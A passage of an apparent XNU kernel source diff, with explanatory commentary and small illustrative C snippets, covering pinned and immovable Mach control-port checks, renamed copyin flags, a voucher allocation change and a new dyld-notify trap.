-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME);
                        goto dead_name;     /* it will release port */
@@ -986,6 +975,14 @@ dead_name:
                assert(port->ip_srights > 0);
 
                if (IE_BITS_UREFS(bits) == 1) {
+                       if (pinned_control_port_enabled && port->ip_pinned != 0) {
+                               ip_unlock(port);
+                               is_write_unlock(space);
+                               mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC,
+                                   ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ?
+                                   kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL);
+                               return KERN_INVALID_CAPABILITY;
+                       }
                        if (--port->ip_srights == 0) {
                                nsrequest = port->ip_nsrequest;
                                if (nsrequest != IP_NULL) {
@@ -1087,6 +1084,7 @@ dead_name:
  *             KERN_SUCCESS            Count was modified.
  *             KERN_INVALID_RIGHT      Entry has wrong type.
  *             KERN_INVALID_VALUE      Bad delta for the right.
+ *             KERN_INVALID_CAPABILITY Deallocating a pinned right.
  */
 
 kern_return_t
@@ -1268,7 +1266,7 @@ ipc_right_delta(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        assert(!(entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE));
                        mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_RIGHT);
                        goto invalid_right;
@@ -1318,7 +1316,7 @@ ipc_right_delta(
                        port = ip_object_to_port(entry->ie_object);
                        assert(port != IP_NULL);
 
-                       if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+                       if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                                /* port is locked and active */
                                ip_unlock(port);
                                port = IP_NULL;
@@ -1408,7 +1406,7 @@ ipc_right_delta(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        assert((entry->ie_bits & MACH_PORT_TYPE_SEND) == 0);
                        goto invalid_right;
                }
@@ -1445,6 +1443,11 @@ ipc_right_delta(
                }
 
                if ((urefs + delta) == 0) {
+                       if (pinned_control_port_enabled && port->ip_pinned != 0) {
+                               ip_unlock(port);
+                               goto pinned_right;
+                       }
+
                        if (--port->ip_srights == 0) {
                                nsrequest = port->ip_nsrequest;
                                if (nsrequest != IP_NULL) {
@@ -1523,6 +1526,15 @@ invalid_right:
        }
        return KERN_INVALID_RIGHT;
 
+pinned_right:
+       assert(pinned_control_port_enabled);
+
+       is_write_unlock(space);
+       mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC,
+           ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ?
+           kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL);
+       return KERN_INVALID_CAPABILITY;
+
 invalid_value:
        is_write_unlock(space);
        mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_VALUE);
@@ -1772,7 +1784,7 @@ ipc_right_info(
                 * types while we still have it locked.  Otherwise,
                 * recapture the (now dead) bits.
                 */
-               if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        if (request != IE_REQ_NONE) {
                                type |= ipc_port_request_type(port, name, request);
                        }
@@ -1864,8 +1876,10 @@ ipc_right_copyin_check_reply(
                 * be read without a lock.
                 */
                if (reply_port->ip_immovable_send) {
-                       mach_port_guard_exception(reply_name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return FALSE;
+                       if (!ip_is_control(reply_port) || immovable_control_port_enabled) {
+                               mach_port_guard_exception_immovable(reply_name, reply_port, MPG_FLAGS_NONE);
+                               return FALSE;
+                       }
                }
 
                if (reply_type == MACH_MSG_TYPE_MOVE_SEND_ONCE) {
@@ -1943,7 +1957,8 @@ ipc_right_copyin_check_guard_locked(
  *     Returns:
  *             KERN_SUCCESS            Acquired an object, possibly IO_DEAD.
  *             KERN_INVALID_RIGHT      Name doesn't denote correct right.
- *             KERN_INVALID_CAPABILITY Trying to move an kobject port or an immovable right
+ *             KERN_INVALID_CAPABILITY Trying to move a kobject port or an immovable right,
+ *                                     or moving the last ref of a pinned right
  *             KERN_INVALID_ARGUMENT   Port is unguarded or guard mismatch
  */
 
@@ -1953,7 +1968,7 @@ ipc_right_copyin(
        mach_port_name_t           name,
        ipc_entry_t                entry,
        mach_msg_type_name_t       msgt_name,
-       ipc_right_copyin_flags_t   flags,
+       ipc_object_copyin_flags_t   flags,
        ipc_object_t               *objectp,
        ipc_port_t                 *sorightp,
        ipc_port_t                 *releasep,
@@ -1964,8 +1979,9 @@ ipc_right_copyin(
        ipc_entry_bits_t bits;
        ipc_port_t port;
        kern_return_t kr;
-       boolean_t deadok = flags & IPC_RIGHT_COPYIN_FLAGS_DEADOK? TRUE : FALSE;
-       boolean_t allow_imm_send = flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND? TRUE : FALSE;
+       boolean_t deadok = !!(flags & IPC_OBJECT_COPYIN_FLAGS_DEADOK);
+       boolean_t allow_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
+       boolean_t soft_fail_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND);
 
        *releasep = IP_NULL;
        *assertcntp = 0;
@@ -2136,7 +2152,7 @@ ipc_right_copyin(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        *releasep = port;
                        goto copy_dead;
@@ -2152,9 +2168,13 @@ ipc_right_copyin(
                }
 
                if (!allow_imm_send && port->ip_immovable_send) {
-                       ip_unlock(port);
-                       mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return KERN_INVALID_CAPABILITY;
+                       if (!ip_is_control(port) || immovable_control_port_enabled) {
+                               ip_unlock(port);
+                               if (!soft_fail_imm_send) {
+                                       mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE);
+                               }
+                               return KERN_INVALID_CAPABILITY;
+                       }
                }
 
                ipc_port_copy_send_locked(port);
@@ -2183,7 +2203,7 @@ ipc_right_copyin(
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        *releasep = port;
                        goto move_dead;
@@ -2193,15 +2213,18 @@ ipc_right_copyin(
                if ((bits & MACH_PORT_TYPE_SEND) == 0) {
                        assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE);
                        assert(port->ip_sorights > 0);
-
                        ip_unlock(port);
                        goto invalid_right;
                }
 
                if (!allow_imm_send && port->ip_immovable_send) {
-                       ip_unlock(port);
-                       mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return KERN_INVALID_CAPABILITY;
+                       if (!ip_is_control(port) || immovable_control_port_enabled) {
+                               ip_unlock(port);
+                               if (!soft_fail_imm_send) {
+                                       mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE);
+                               }
+                               return KERN_INVALID_CAPABILITY;
+                       }
                }
 
                if (IE_BITS_UREFS(bits) == 1) {
@@ -2211,6 +2234,7 @@ ipc_right_copyin(
                                assert(port->ip_receiver == space);
                                assert(IE_BITS_TYPE(bits) ==
                                    MACH_PORT_TYPE_SEND_RECEIVE);
+                               assert(port->ip_pinned == 0);
 
                                ip_reference(port);
                        } else {
@@ -2281,9 +2305,13 @@ ipc_right_copyin(
                }
 
                if (!allow_imm_send && port->ip_immovable_send) {
-                       ip_unlock(port);
-                       mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return KERN_INVALID_CAPABILITY;
+                       if (!ip_is_control(port) || immovable_control_port_enabled) {
+                               ip_unlock(port);
+                               if (!soft_fail_imm_send) {
+                                       mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE);
+                               }
+                               return KERN_INVALID_CAPABILITY;
+                       }
                }
 
                assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE);
@@ -2392,7 +2420,7 @@ ipc_right_copyin_two_move_sends(
        port = ip_object_to_port(entry->ie_object);
        assert(port != IP_NULL);
 
-       if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+       if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                *releasep = port;
                goto invalid_right;
        }
@@ -2520,7 +2548,7 @@ ipc_right_copyin_two(
                ipc_object_t object_two;
 
                kr = ipc_right_copyin(space, name, entry,
-                   msgt_one, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
+                   msgt_one, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
                    objectp, sorightp, releasep,
                    &assertcnt, 0, NULL);
                assert(assertcnt == 0);
@@ -2539,7 +2567,7 @@ ipc_right_copyin_two(
                 *      receive right.
                 */
                kr = ipc_right_copyin(space, name, entry,
-                   msgt_two, IPC_RIGHT_COPYIN_FLAGS_NONE,
+                   msgt_two, IPC_OBJECT_COPYIN_FLAGS_NONE,
                    &object_two, sorightp, releasep,
                    &assertcnt, 0, NULL);
                assert(assertcnt == 0);
@@ -2579,7 +2607,7 @@ ipc_right_copyin_two(
                }
 
                kr = ipc_right_copyin(space, name, entry,
-                   msgt_name, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
+                   msgt_name, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
                    objectp, sorightp, releasep,
                    &assertcnt, 0, NULL);
                assert(assertcnt == 0);
@@ -2626,6 +2654,7 @@ ipc_right_copyout(
        mach_port_name_t        name,
        ipc_entry_t             entry,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        ipc_object_t            object)
@@ -2642,6 +2671,12 @@ ipc_right_copyout(
 
        port = ip_object_to_port(object);
 
+       if (pinned_control_port_enabled && (flags & IPC_OBJECT_COPYOUT_FLAGS_PINNED)) {
+               assert(!port->ip_pinned);
+               assert(port->ip_immovable_send);
+               port->ip_pinned = 1;
+       }
+
        switch (msgt_name) {
        case MACH_MSG_TYPE_PORT_SEND_ONCE:
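
The ipc_right.c changes above add the pinned-right checks to ipc_right_dealloc() and ipc_right_delta(): dropping the last user reference on a pinned send right either returns KERN_INVALID_CAPABILITY or raises a kGUARD_EXC_MOD_REFS guard exception, depending on IPC_CONTROL_PORT_OPTIONS_PINNED_HARD. A user-space probe of that behavior is sketched below; it targets the task control port because that is the right the pinning work protects. Caveats: on kernels without pinning the call can actually succeed (after which the process has discarded its own task port), and on hard-enforcing kernels the process is terminated by the guard exception instead of seeing an error code, so this is purely illustrative.

#include <stdio.h>
#include <mach/mach.h>
#include <mach/mach_error.h>

int
main(void)
{
	/*
	 * Try to drop the last user reference on the task control port's
	 * send right. With pinned control ports this is refused: either
	 * KERN_INVALID_CAPABILITY comes back (soft mode) or the task takes
	 * a kGUARD_EXC_MOD_REFS guard exception (hard mode), matching the
	 * new checks in ipc_right_dealloc() and ipc_right_delta().
	 */
	kern_return_t kr = mach_port_mod_refs(mach_task_self(),
	    mach_task_self(), MACH_PORT_RIGHT_SEND, -1);

	printf("mach_port_mod_refs: %s (0x%x)\n", mach_error_string(kr), kr);
	return 0;
}
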
 
index a3049efc70a38bc7297ed376152d10ba14d7af42..fcaefbad6f3193e44f8191d551d59b16ad38e418 100644 (file)
 #define ipc_right_lookup_read           ipc_right_lookup_write
 #define ipc_right_lookup_two_read       ipc_right_lookup_two_write
 
-typedef uint32_t ipc_right_copyin_flags_t;
-
-#define IPC_RIGHT_COPYIN_FLAGS_NONE                   0x0
-#define IPC_RIGHT_COPYIN_FLAGS_DEADOK                 0x1
-#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND   0x2
-#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE   0x4   /* allow copyin of a send once right to a dead port with no dead name requests */
-
 /* Find an entry in a space, given the name */
 extern kern_return_t ipc_right_lookup_write(
        ipc_space_t             space,
@@ -96,7 +89,7 @@ extern kern_return_t ipc_right_lookup_two_write(
        ipc_entry_t             *entryp2);
 
 /* Translate (space, object) -> (name, entry) */
-extern boolean_t ipc_right_reverse(
+extern bool          ipc_right_reverse(
        ipc_space_t             space,
        ipc_object_t            object,
        mach_port_name_t        *namep,
@@ -123,9 +116,7 @@ extern ipc_port_t ipc_right_request_cancel(
                 ipc_right_request_cancel((space), (port), (name), (entry)))
 
 /* Check if an entry is being used */
-extern boolean_t ipc_right_inuse(
-       ipc_space_t             space,
-       mach_port_name_t        name,
+extern bool      ipc_right_inuse(
        ipc_entry_t             entry);
 
 /* Check if the port has died */
@@ -134,7 +125,7 @@ extern boolean_t ipc_right_check(
        ipc_port_t               port,
        mach_port_name_t         name,
        ipc_entry_t              entry,
-       ipc_right_copyin_flags_t flags);
+       ipc_object_copyin_flags_t flags);
 
 /* Clean up an entry in a dead space */
 extern void ipc_right_terminate(
@@ -193,7 +184,7 @@ extern kern_return_t ipc_right_copyin(
        mach_port_name_t          name,
        ipc_entry_t               entry,
        mach_msg_type_name_t      msgt_name,
-       ipc_right_copyin_flags_t  flags,
+       ipc_object_copyin_flags_t  flags,
        ipc_object_t              *objectp,
        ipc_port_t                *sorightp,
        ipc_port_t                *releasep,
@@ -218,6 +209,7 @@ extern kern_return_t ipc_right_copyout(
        mach_port_name_t        name,
        ipc_entry_t             entry,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        ipc_object_t            object);
index f5fde0daec3c64dcf6f1a20d811001caa7662939..ce2eb466428ea98952eddc0213038fbbc66a7c04 100644 (file)
@@ -63,10 +63,16 @@ typedef struct ipc_kmsg *ipc_kmsg_t;
 typedef uint8_t sync_qos_count_t;
 
 typedef uint64_t ipc_label_t;
-#define IPC_LABEL_NONE     ((ipc_label_t)0x0)
-#define IPC_LABEL_DEXT     ((ipc_label_t)0x1)
-#define IPC_LABEL_PLATFORM ((ipc_label_t)0x2)
-#define IPC_LABEL_SPECIAL  ((ipc_label_t)0x3)
+#define IPC_LABEL_NONE          ((ipc_label_t)0x0000)
+#define IPC_LABEL_DEXT          ((ipc_label_t)0x0001)
+#define IPC_LABEL_PLATFORM      ((ipc_label_t)0x0002)
+#define IPC_LABEL_SPECIAL       ((ipc_label_t)0x0003)
+#define IPC_LABEL_SPACE_MASK    ((ipc_label_t)0x00ff)
+
+#define IPC_LABEL_SUBST_TASK    ((ipc_label_t)0x0100)
+#define IPC_LABEL_SUBST_THREAD  ((ipc_label_t)0x0200)
+#define IPC_LABEL_SUBST_ONCE    ((ipc_label_t)0x0300)
+#define IPC_LABEL_SUBST_MASK    ((ipc_label_t)0xff00)
 
 typedef struct ipc_kobject_label *ipc_kobject_label_t;
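
The ipc_types.h hunk widens the label space: the masks suggest the low byte (IPC_LABEL_SPACE_MASK) keeps the existing DEXT/PLATFORM/SPECIAL classes while the high byte (IPC_LABEL_SUBST_MASK) encodes the new substitution kinds used by the port-substitution path in ipc_object_copyout(). A small sketch of splitting a label with the two masks (the values are copied from the diff; the surrounding program is illustrative):

#include <stdint.h>
#include <stdio.h>

typedef uint64_t ipc_label_t;

#define IPC_LABEL_DEXT          ((ipc_label_t)0x0001)
#define IPC_LABEL_SPACE_MASK    ((ipc_label_t)0x00ff)
#define IPC_LABEL_SUBST_TASK    ((ipc_label_t)0x0100)
#define IPC_LABEL_SUBST_MASK    ((ipc_label_t)0xff00)

int
main(void)
{
	/* A label can carry both a space class and a substitution kind. */
	ipc_label_t label = IPC_LABEL_DEXT | IPC_LABEL_SUBST_TASK;

	printf("space part: 0x%llx\n",
	    (unsigned long long)(label & IPC_LABEL_SPACE_MASK));
	printf("subst part: 0x%llx\n",
	    (unsigned long long)(label & IPC_LABEL_SUBST_MASK));
	return 0;
}
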
 
index 4a753c7371144b27d52231d70d50cdbd7fda6b2b..f8673f3252f7a4f55457d069e9e5fb64d1517885 100644 (file)
@@ -364,7 +364,7 @@ unsafe_convert_port_to_voucher(
                 * keeps the voucher bound to the port (and active).
                 */
                if (ip_kotype(port) == IKOT_VOUCHER) {
-                       return (uintptr_t)port->ip_kobject;
+                       return (uintptr_t)ipc_kobject_get(port);
                }
        }
        return (uintptr_t)IV_NULL;
@@ -492,7 +492,7 @@ convert_voucher_to_port(ipc_voucher_t voucher)
         * if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&voucher->iv_port,
-           (ipc_kobject_t)voucher, IKOT_VOUCHER, false, 0)) {
+           (ipc_kobject_t)voucher, IKOT_VOUCHER, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                ipc_voucher_release(voucher);
        }
        return voucher->iv_port;
@@ -706,7 +706,7 @@ convert_voucher_attr_control_to_port(ipc_voucher_attr_control_t control)
         * ipc_voucher_attr_control_notify if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&control->ivac_port,
-           (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, false, 0)) {
+           (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                ivac_release(control);
        }
        return control->ivac_port;
@@ -2876,7 +2876,7 @@ struct user_data_value_element {
        iv_index_t                              e_sum;
        iv_index_t                              e_hash;
        queue_chain_t                           e_hash_link;
-       uint8_t                                 e_data[];
+       uint8_t                                *e_data;
 };
 
 typedef struct user_data_value_element *user_data_element_t;
@@ -2967,6 +2967,13 @@ ipc_voucher_attr_control_t test_control;
 #define USER_DATA_ASSERT_KEY(key) assert(MACH_VOUCHER_ATTR_KEY_TEST == (key))
 #endif
 
+static void
+user_data_value_element_free(user_data_element_t elem)
+{
+       kheap_free(KHEAP_DATA_BUFFERS, elem->e_data, elem->e_size);
+       kfree(elem, sizeof(struct user_data_value_element));
+}
+
 /*
  *     Routine:        user_data_release_value
  *     Purpose:
@@ -2996,7 +3003,7 @@ user_data_release_value(
        if (sync == elem->e_made) {
                queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);
                user_data_unlock();
-               kfree(elem, sizeof(*elem) + elem->e_size);
+               user_data_value_element_free(elem);
                return KERN_SUCCESS;
        }
        assert(sync < elem->e_made);
@@ -3076,7 +3083,7 @@ retry:
                        user_data_unlock();
 
                        if (NULL != alloc) {
-                               kfree(alloc, sizeof(*alloc) + content_size);
+                               user_data_value_element_free(alloc);
                        }
 
                        return elem;
@@ -3086,11 +3093,12 @@ retry:
        if (NULL == alloc) {
                user_data_unlock();
 
-               alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);
+               alloc = kalloc(sizeof(struct user_data_value_element));
                alloc->e_made = 1;
                alloc->e_size = content_size;
                alloc->e_sum = sum;
                alloc->e_hash = hash;
+               alloc->e_data = kheap_alloc(KHEAP_DATA_BUFFERS, content_size, Z_WAITOK | Z_NOFAIL);
                memcpy(alloc->e_data, content, content_size);
                goto retry;
        }
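
In ipc_voucher.c the user_data_value_element payload moves out of the trailing flexible array member into its own allocation from KHEAP_DATA_BUFFERS, with user_data_value_element_free() releasing both pieces. A user-space sketch of the same reshaping (names are illustrative, not the kernel's):

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Old shape: header and payload in one allocation (flexible array member). */
struct elem_inline {
	uint32_t size;
	uint8_t  data[];
};

/* New shape: payload lives in its own allocation, as with
 * kheap_alloc(KHEAP_DATA_BUFFERS, ...) in the diff. */
struct elem_split {
	uint32_t size;
	uint8_t *data;
};

static struct elem_split *
elem_split_create(const void *content, uint32_t size)
{
	struct elem_split *e = malloc(sizeof(*e));
	e->size = size;
	e->data = malloc(size);
	memcpy(e->data, content, size);
	return e;
}

/* Both allocations must be released together, mirroring
 * user_data_value_element_free(). */
static void
elem_split_free(struct elem_split *e)
{
	free(e->data);
	free(e);
}

int
main(void)
{
	struct elem_split *e = elem_split_create("voucher", 7);
	elem_split_free(e);
	return 0;
}

Splitting the allocation keeps the caller-supplied voucher bytes in the data-buffers heap, separate from the element header, which is presumably the motivation for the change.
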
index 903fc3bde881f12ba1e56b0e48b95a3e827f42f5..6ad851ac5ed8f3dfb2a62232a606b8b838db9bbc 100644 (file)
@@ -203,7 +203,7 @@ mach_port_space_info(
        }
 
 #if !(DEVELOPMENT || DEBUG) && CONFIG_MACF
-       const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task) == 0);
+       const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0);
 #else
        const boolean_t dbg_ok = TRUE;
 #endif
index 66263ba91e7917ca461aa375b312237545fbc0af..49eb98146805f52fd7be4b00213ef2f559716aea 100644 (file)
@@ -37,6 +37,7 @@
 #include <kern/ipc_tt.h>
 #include <kern/kalloc.h>
 #include <vm/vm_protos.h>
+#include <kdp/kdp_dyld.h>
 
 kern_return_t
 mach_port_get_attributes(
@@ -46,6 +47,8 @@ mach_port_get_attributes(
        mach_port_info_t        info,
        mach_msg_type_number_t  *count);
 
+extern lck_mtx_t g_dyldinfo_mtx;
+
 int
 _kernelrpc_mach_vm_allocate_trap(struct _kernelrpc_mach_vm_allocate_trap_args *args)
 {
@@ -281,7 +284,7 @@ _kernelrpc_mach_port_insert_right_trap(struct _kernelrpc_mach_port_insert_right_
        }
 
        rv = ipc_object_copyin(task->itk_space, args->poly, args->polyPoly,
-           (ipc_object_t *)&port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           (ipc_object_t *)&port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
        if (rv != KERN_SUCCESS) {
                goto done;
        }
@@ -302,7 +305,7 @@ done:
 int
 _kernelrpc_mach_port_get_attributes_trap(struct _kernelrpc_mach_port_get_attributes_args *args)
 {
-       task_inspect_t task = port_name_to_task_read_no_eval(args->target);
+       task_read_t task = port_name_to_task_read_no_eval(args->target);
        int rv = MACH_SEND_INVALID_DEST;
        mach_msg_type_number_t count;
 
@@ -538,10 +541,8 @@ _kernelrpc_mach_port_request_notification_trap(
                // thread-argument-passing and its value should not be garbage
                current_thread()->ith_knote = ITH_KNOTE_NULL;
                rv = ipc_object_copyout(task->itk_space, ip_to_object(previous),
-                   MACH_MSG_TYPE_PORT_SEND_ONCE, NULL, NULL, &previous_name);
+                   MACH_MSG_TYPE_PORT_SEND_ONCE, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &previous_name);
                if (rv != KERN_SUCCESS) {
-                       ipc_object_destroy(ip_to_object(previous),
-                           MACH_MSG_TYPE_PORT_SEND_ONCE);
                        goto done;
                }
        }
@@ -665,3 +666,187 @@ done:
        ipc_voucher_release(voucher);
        return kr;
 }
+
+/*
+ * Mach Trap: task_dyld_process_info_notify_get_trap
+ *
+ * Return an array of active dyld notifier port names for current_task(). User
+ * is responsible for allocating the memory for the mach port names array
+ * and deallocating the port names inside the array returned.
+ *
+ * Does not consume any reference.
+ *
+ * Args:
+ *     names_addr: Address for mach port names array.          (In param only)
+ *     names_count_addr: Number of active dyld notifier ports. (In-Out param)
+ *         In:  Number of slots available for copyout in caller
+ *         Out: Actual number of ports copied out
+ *
+ * Returns:
+ *
+ *     KERN_SUCCESS: A valid namesCnt is returned. (Can be zero)
+ *     KERN_INVALID_ARGUMENT: Arguments are invalid.
+ *     KERN_MEMORY_ERROR: Memory copyio operations failed.
+ *     KERN_NO_SPACE: User-allocated memory for port names copyout is insufficient.
+ *
+ *     Other error code see task_info().
+ */
+kern_return_t
+task_dyld_process_info_notify_get_trap(struct task_dyld_process_info_notify_get_trap_args *args)
+{
+       struct task_dyld_info dyld_info;
+       mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT;
+       mach_port_name_t copyout_names[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       ipc_port_t copyout_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       uint32_t copyout_count = 0, release_count = 0, active_count = 0;
+       mach_vm_address_t ports_addr; /* a user space address */
+       mach_port_name_t new_name;
+       natural_t user_names_count = 0;
+       ipc_port_t sright;
+       kern_return_t kr;
+       ipc_port_t *portp;
+       ipc_entry_t entry;
+
+       if ((mach_port_name_array_t)args->names_addr == NULL || (natural_t *)args->names_count_addr == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       kr = copyin((vm_map_address_t)args->names_count_addr, &user_names_count, sizeof(natural_t));
+       if (kr) {
+               return KERN_MEMORY_FAILURE;
+       }
+
+       if (user_names_count == 0) {
+               return KERN_NO_SPACE;
+       }
+
+       kr = task_info(current_task(), TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count);
+       if (kr) {
+               return kr;
+       }
+
+       if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user32_dyld_all_image_infos, notifyMachPorts));
+       } else {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user64_dyld_all_image_infos, notifyMachPorts));
+       }
+
+       lck_mtx_lock(&g_dyldinfo_mtx);
+       itk_lock(current_task());
+
+       if (current_task()->itk_dyld_notify == NULL) {
+               itk_unlock(current_task());
+               (void)copyoutmap_atomic32(current_task()->map, MACH_PORT_NULL, (vm_map_address_t)ports_addr); /* reset magic */
+               lck_mtx_unlock(&g_dyldinfo_mtx);
+
+               kr = copyout(&copyout_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t));
+               return kr ? KERN_MEMORY_ERROR : KERN_SUCCESS;
+       }
+
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &current_task()->itk_dyld_notify[slot];
+               if (*portp == IPC_PORT_NULL) {
+                       continue;
+               } else {
+                       sright = ipc_port_copy_send(*portp);
+                       if (IP_VALID(sright)) {
+                               copyout_ports[active_count++] = sright; /* donates */
+                               sright = IPC_PORT_NULL;
+                       } else {
+                               release_ports[release_count++] = *portp; /* donates */
+                               *portp = IPC_PORT_NULL;
+                       }
+               }
+       }
+
+       task_dyld_process_info_update_helper(current_task(), active_count,
+           (vm_map_address_t)ports_addr, release_ports, release_count);
+       /* itk_lock, g_dyldinfo_mtx are unlocked upon return */
+
+       for (int i = 0; i < active_count; i++) {
+               sright = copyout_ports[i]; /* donates */
+               copyout_ports[i] = IPC_PORT_NULL;
+
+               assert(IP_VALID(sright));
+               ip_reference(sright);
+               /*
+                * Below we consume each send right in copyout_ports, and if copyout_send
+                * succeeds, replace it with a port ref; otherwise release the port ref.
+                *
+                * We can reuse copyout_ports array for this purpose since
+                * copyout_count <= active_count.
+                */
+               new_name = ipc_port_copyout_send(sright, current_space()); /* consumes */
+               if (MACH_PORT_VALID(new_name)) {
+                       copyout_names[copyout_count] = new_name;
+                       copyout_ports[copyout_count] = sright; /* now holds port ref */
+                       copyout_count++;
+               } else {
+                       ip_release(sright);
+               }
+       }
+
+       assert(copyout_count <= active_count);
+
+       if (user_names_count < copyout_count) {
+               kr = KERN_NO_SPACE;
+               goto copyout_failed;
+       }
+
+       /* copyout to caller's local copy */
+       kr = copyout(copyout_names, (vm_map_address_t)args->names_addr,
+           copyout_count * sizeof(mach_port_name_t));
+       if (kr) {
+               kr = KERN_MEMORY_ERROR;
+               goto copyout_failed;
+       }
+
+       kr = copyout(&copyout_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t));
+       if (kr) {
+               kr = KERN_MEMORY_ERROR;
+               goto copyout_failed;
+       }
+
+       /* now, release port refs on copyout_ports */
+       for (int i = 0; i < copyout_count; i++) {
+               sright = copyout_ports[i];
+               assert(IP_VALID(sright));
+               ip_release(sright);
+       }
+
+       return KERN_SUCCESS;
+
+
+copyout_failed:
+       /*
+        * No locks are held beyond this point.
+        *
+        * Release port refs on copyout_ports, and deallocate ports that we copied out
+        * earlier.
+        */
+       for (int i = 0; i < copyout_count; i++) {
+               sright = copyout_ports[i];
+               assert(IP_VALID(sright));
+
+               if (ipc_right_lookup_write(current_space(), copyout_names[i], &entry)) {
+                       /* userspace has deallocated the name we copied out */
+                       ip_release(sright);
+                       continue;
